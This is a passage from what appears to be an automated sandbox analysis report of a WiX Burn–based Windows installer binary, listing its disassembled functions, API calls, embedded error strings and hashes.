                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: AUState$CurrentRebootAttempts$PendingFileRenameOperations$PendingFileRenameOperations2$SOFTWARE\Microsoft\ServerManager$SOFTWARE\Microsoft\Updates$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending$SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update$SYSTEM\CurrentControlSet\Control\Session Manager$SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations$UpdateExeVolatile
                                                                                                                                                                  • API String ID: 3535843008-3032311648
                                                                                                                                                                  • Opcode ID: 1d0b184a3950c404416ae403810a74516651d900555e5c2ad3eedddf92eb2d0e
                                                                                                                                                                  • Instruction ID: a5b673478ead90616f8c9b1d844ec36c38b5195fae1f079d4cffd9e69fa74c0b
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d0b184a3950c404416ae403810a74516651d900555e5c2ad3eedddf92eb2d0e
                                                                                                                                                                  • Instruction Fuzzy Hash: B931C471E48369B78B31B6E19D45E9FEA7CDED0B44B500556B800B2247DAB0EE10C7B1
                                                                                                                                                                  Function 00939734 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 233COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 009398F9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to execute compatible MSI package.$Failed to find package: %ls$Failed to read MSI compatible package id.$Failed to read MSI package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$Package '%ls' has no compatible MSI package$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                  • API String ID: 1825529933-1833463798
                                                                                                                                                                  • Opcode ID: 18e23ce2b3bbcbcd76ca6cca751025a309820fc055442d63826d6c100772152b
                                                                                                                                                                  • Instruction ID: bbc42b6c50ba24e48a44cce5b7d9fefc3e358b46743b674a0e38d421a9e9052d
                                                                                                                                                                  • Opcode Fuzzy Hash: 18e23ce2b3bbcbcd76ca6cca751025a309820fc055442d63826d6c100772152b
                                                                                                                                                                  • Instruction Fuzzy Hash: A971C671A40219BBEB22DED5CC4AFEF7A7CEB84B10F110515B605BA1C1D6B49E44CBA0
                                                                                                                                                                  Function 0097B60C Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 191COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,?,0094E3CA,?), ref: 0097B63B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,?,0094E3CA,?,00916DA2,00000000,?,00916DA2,00000000), ref: 0097B656
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate default application id., xrefs: 0097B715
                                                                                                                                                                  • type, xrefs: 0097B67D
                                                                                                                                                                  • Failed to allocate memory for update entries., xrefs: 0097B6F9
                                                                                                                                                                  • Failed to reallocate memory for update entries., xrefs: 0097B7C9
                                                                                                                                                                  • http://appsyndication.org/2006/appsyn, xrefs: 0097B62E
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp, xrefs: 0097B6ED, 0097B721, 0097B7BD
                                                                                                                                                                  • application, xrefs: 0097B648
                                                                                                                                                                  • Failed to allocate default application type., xrefs: 0097B707
                                                                                                                                                                  • Failed to process ATOM entry., xrefs: 0097B7DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate default application id.$Failed to allocate default application type.$Failed to allocate memory for update entries.$Failed to process ATOM entry.$Failed to reallocate memory for update entries.$application$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                  • API String ID: 2664528157-2947066191
                                                                                                                                                                  • Opcode ID: d9a245015d3d6c949c6748ac48cb92fd2ad3d448ef32660c8f2aa9f2d84b07b7
                                                                                                                                                                  • Instruction ID: 08d722b192950e9f4b4e2dfedd929400b5ab9c29720358351151fa0506430df9
                                                                                                                                                                  • Opcode Fuzzy Hash: d9a245015d3d6c949c6748ac48cb92fd2ad3d448ef32660c8f2aa9f2d84b07b7
                                                                                                                                                                  • Instruction Fuzzy Hash: B951F772780705BBDB249B14CCC6F5B77A9ABC1B24F20C518F629AF6D1DBB4E9408B50
                                                                                                                                                                  Function 009200E7 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 179libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(0097E7C0,00000000,00000008,?,BundleExtensionData.xml,00000001,?,00000000,?), ref: 009201D1
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BundleExtensionCreate), ref: 009201E8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: ($BundleExtensionCreate$BundleExtensionData.xml$Failed to create BundleExtension '%ls'.$Failed to get BundleExtensionCreate entry-point '%ls'.$Failed to get BundleExtensionDataPath.$Failed to load BundleExtension DLL '%ls': '%ls'.$d:\a\wix4\wix4\src\burn\engine\burnextension.cpp
                                                                                                                                                                  • API String ID: 2574300362-4260127901
                                                                                                                                                                  • Opcode ID: f69a6e42f8f512608833f764752d389d950a0660efb4d52270c1fa36259ec9cf
                                                                                                                                                                  • Instruction ID: 0ca30f2a76f47639fb861a9178cf3909bd205059bd20005ebcf2a8e5213a0caa
                                                                                                                                                                  • Opcode Fuzzy Hash: f69a6e42f8f512608833f764752d389d950a0660efb4d52270c1fa36259ec9cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C519172E41229EBDB11DF98DC89B9EBBF4AF88710F014056F914BB356D7709940CB90
                                                                                                                                                                  Function 0096BB29 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 143COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(0097639A,00000008,00000000,00000000,00000000,?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000), ref: 0096BB41
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BB4B
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000000,?,00000000,00000000,0097639A,?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000), ref: 0096BB9D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BBA7
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000000,?,00000000,0097639A,0097639A,0097639A,00000001,00000000,?,?,?,0096BECF,0097639A,00000001,00000000,00000000), ref: 0096BC33
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BC3D
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BCA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastToken$Information$CloseHandleOpenProcess
                                                                                                                                                                  • String ID: Failed to allocate token information.$Failed to get information from process token size.$Failed to get information from process token.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 3038379890-3612203842
                                                                                                                                                                  • Opcode ID: 2945379c052cde4f1ab7832ffef4515748f3213c71657adce7947d5288e7434d
                                                                                                                                                                  • Instruction ID: 2fb6fcda9df289096140456f56f6c33ea5240ca56ce5e3bbbbb314ecd76844d9
                                                                                                                                                                  • Opcode Fuzzy Hash: 2945379c052cde4f1ab7832ffef4515748f3213c71657adce7947d5288e7434d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7641C172A41225B7E7305A659C4AFEF6D6CDB45B50F010455BA08FA1D1F7B88E80A6E0
                                                                                                                                                                  Function 00916A25 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 120sleepshutdownCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(SeShutdownPrivilege,?,00000000,00000001,A0000005,?,00918015,?,?,?,?,?,?), ref: 00916A39
                                                                                                                                                                    • Part of subcall function 0096B884: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096B8BC
                                                                                                                                                                    • Part of subcall function 0096B884: GetLastError.KERNEL32 ref: 0096B8C6
                                                                                                                                                                    • Part of subcall function 0096B884: CloseHandle.KERNEL32(00000000), ref: 0096B9DD
                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,00000001,00000000,?,00918015,?,?,?,?,?,?), ref: 00916A8C
                                                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(?,00918015,?,?,?,?), ref: 00916AAB
                                                                                                                                                                  • GetLastError.KERNEL32(?,00918015,?,?,?,?,?,?), ref: 00916AB1
                                                                                                                                                                    • Part of subcall function 009360F9: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,00916A7F,?,00000001,00000000,?,00918015,?,?,?,?,?,?), ref: 00936108
                                                                                                                                                                    • Part of subcall function 009360F9: LeaveCriticalSection.KERNEL32(?,?,00916A7F,?,00000001,00000000,?,00918015,?,?,?,?,?,?), ref: 00936129
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00916B21
                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,00918015,?,?,?,?,?,?), ref: 00916B3B
                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,00918015,?,?,?,?,?,?), ref: 00916B70
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00916B7C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep$CriticalErrorLastSectionWindow$CloseCurrentEnterHandleInitiateLeaveLookupPrivilegeProcessShutdownSystemValue
                                                                                                                                                                  • String ID: Failed to enable shutdown privilege in process token.$Failed to schedule restart.$SeShutdownPrivilege$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 2197606043-2157809017
                                                                                                                                                                  • Opcode ID: 99bf869c42df4ddfe60ad9de4dd3cb0b2ef4053a58e8d52e067f1f4c956b77c4
                                                                                                                                                                  • Instruction ID: 587f4eeeb99eeac19abd958ce7fe1ffde48c05c797fa74f760640e62010eb878
                                                                                                                                                                  • Opcode Fuzzy Hash: 99bf869c42df4ddfe60ad9de4dd3cb0b2ef4053a58e8d52e067f1f4c956b77c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 74312D72F88319BBE7105F559C8AF9B356CEB84B55F144034FA09EB281DA749CC056A0
                                                                                                                                                                  Function 00936971 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 94COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(009173DE,00000000,00916CF2,2000000A,2000000A,?,0093B226,00916CF2,?,009173DE,00000001,009173DE,009173E2,00916DA2,00916CF2,00000000), ref: 00936979
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00916CF2,00000000,00000000), ref: 00936A82
                                                                                                                                                                    • Part of subcall function 00972587: ShellExecuteExW.SHELL32 ref: 00972603
                                                                                                                                                                    • Part of subcall function 00972587: GetLastError.KERNEL32 ref: 00972609
                                                                                                                                                                    • Part of subcall function 00972587: CloseHandle.KERNEL32(?), ref: 00972659
                                                                                                                                                                  • GetProcessId.KERNEL32(00000000,0154B7FF,00916CF2,runas,00000000,00000008,?,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 00936A62
                                                                                                                                                                  Strings
                                                                                                                                                                  • burn.log.mode, xrefs: 009369E5
                                                                                                                                                                  • Failed to launch elevated child process: %ls, xrefs: 00936A3E
                                                                                                                                                                  • Failed to allocate parameters for elevated process., xrefs: 009369B3
                                                                                                                                                                  • -q -%ls %ls %ls %u, xrefs: 0093699F
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 009369C5, 00936A50
                                                                                                                                                                  • -%ls=%ls, xrefs: 009369ED
                                                                                                                                                                  • Failed to set log mode in elevated process command-line., xrefs: 00936A01
                                                                                                                                                                  • burn.elevated, xrefs: 0093699A
                                                                                                                                                                  • runas, xrefs: 00936A1F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
                                                                                                                                                                  • String ID: -%ls=%ls$-q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$Failed to set log mode in elevated process command-line.$burn.elevated$burn.log.mode$d:\a\wix4\wix4\src\burn\engine\elevation.cpp$runas
                                                                                                                                                                  • API String ID: 163010291-2434619687
                                                                                                                                                                  • Opcode ID: cd352f79474ecddbbbcd6767ea62ef4ecfae60781244e6f2bc77df724bf92e5f
                                                                                                                                                                  • Instruction ID: a87bf0e620fcd7c67dced281fbd5108cb859ec1193c9b1166ef7155a422d2990
                                                                                                                                                                  • Opcode Fuzzy Hash: cd352f79474ecddbbbcd6767ea62ef4ecfae60781244e6f2bc77df724bf92e5f
                                                                                                                                                                  • Instruction Fuzzy Hash: C331F671E80319BFDF11AF94CC4AFDDBA78AF84714F108165F618B6280D3B15AA09B90
                                                                                                                                                                  Function 0091A2EB Relevance: 19.8, APIs: 2, Strings: 11, Instructions: 293COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,00000024,00000001,00000001,00000000,?,000000F8,00000001,00000000,000000F8,00000024,?,00000000,?), ref: 0091A317
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0091A61A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to parse variable value as version., xrefs: 0091A51F
                                                                                                                                                                  • Failed to read variable included flag., xrefs: 0091A5F8
                                                                                                                                                                  • Failed to read variable name., xrefs: 0091A5E4
                                                                                                                                                                  • Failed to read variable value as string., xrefs: 0091A536, 0091A5A8
                                                                                                                                                                  • Failed to set variable., xrefs: 0091A5BC
                                                                                                                                                                  • Unsupported variable type., xrefs: 0091A54D
                                                                                                                                                                  • Failed to read variable value as number., xrefs: 0091A580
                                                                                                                                                                  • Failed to read variable count., xrefs: 0091A337
                                                                                                                                                                  • Failed to set variable value., xrefs: 0091A508, 0091A569, 0091A594
                                                                                                                                                                  • Failed to read variable value type., xrefs: 0091A5D0
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A60A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to parse variable value as version.$Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1722372363
                                                                                                                                                                  • Opcode ID: 78804ead5b7aad985d3284a3df02373802d30efee5069a1b7137cd51620f06da
                                                                                                                                                                  • Instruction ID: ffbaeea1c4df8207245e002cc9cfe47cce925b9393c0465478ecaec30bc81995
                                                                                                                                                                  • Opcode Fuzzy Hash: 78804ead5b7aad985d3284a3df02373802d30efee5069a1b7137cd51620f06da
                                                                                                                                                                  • Instruction Fuzzy Hash: EA91D631F4632DBBEB129A54CD4AFEF7A7CEB54B54F140111F601BA1D0D2B49E808B66
                                                                                                                                                                  Function 0096C5BE Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 204registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000), ref: 0096C811
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls$Failed to delete registry key (ex).$Failed to delete registry key.$Failed to enumerate key 0$Failed to open this key for enumerating subkeys: %ls$Failed to recursively delete subkey: %ls$RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 3535843008-329788176
                                                                                                                                                                  • Opcode ID: 440c9b7a0d0054229f308d16b525637ddf8423b991bc675f266d5937ff5ad126
                                                                                                                                                                  • Instruction ID: ea120125299e38cba5da9b8d000445812896f62eee94237ba9e2666775014cc8
                                                                                                                                                                  • Opcode Fuzzy Hash: 440c9b7a0d0054229f308d16b525637ddf8423b991bc675f266d5937ff5ad126
                                                                                                                                                                  • Instruction Fuzzy Hash: A75156B3E40238B7DB316A94CC4AFBF7A689B49B55F054061FE917B290D7B44D40EAD0
                                                                                                                                                                  Function 009785DB Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00978654
                                                                                                                                                                    • Part of subcall function 0097666D: RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00976717
                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00978791
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 009787A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$DeleteErrorFileHandleLast
                                                                                                                                                                  • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to open internet session$Ignoring failure to get size and time for URL: %ls (error 0x%x)$WiX\Burn$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 3163412224-1623104175
                                                                                                                                                                  • Opcode ID: a3fbcc997048e772cef24aebd5aec06ecd7fc26a4330c340a294cf8de4cb36f7
                                                                                                                                                                  • Instruction ID: 44eed2b0d7275e7ff2a3579138a4e4d743570fb80318c2cc02146ee7973bb212
                                                                                                                                                                  • Opcode Fuzzy Hash: a3fbcc997048e772cef24aebd5aec06ecd7fc26a4330c340a294cf8de4cb36f7
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B515E72A40219BFDB119FA4CC4AFEF7BBCEF49700F148155FA19E6191E6718A109BA0
                                                                                                                                                                  Function 00921295 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 169registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00916DEA,00000000,C95B5EC6,00000000,00000000,00000000,54B7FF10,00916DEA,00000001,00000001,00916CF2,00000000,8D000001,00916DEA), ref: 00921472
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to query registry key value., xrefs: 009213DD
                                                                                                                                                                  • Failed to format value string., xrefs: 0092137B
                                                                                                                                                                  • Failed to set variable., xrefs: 00921424
                                                                                                                                                                  • Failed to format key string., xrefs: 009212C5
